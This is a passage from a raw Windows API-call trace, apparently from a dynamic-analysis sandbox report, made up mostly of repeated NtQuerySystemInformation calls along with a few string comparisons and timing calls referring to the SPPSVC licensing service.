(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcea0, Length=0x28, ResultLength=0x0) [0271.856] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0271.857] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0271.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x28, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0271.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0271.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.871] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce70 | out: lpSystemTimeAsFileTime=0xf7a68fce70*(dwLowDateTime=0x346a9b06, dwHighDateTime=0x1d63874)) [0271.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0271.872] GetTickCount () returned 0x1184208 [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0271.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0271.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0271.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x38, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.925] NtQuerySystemInformation 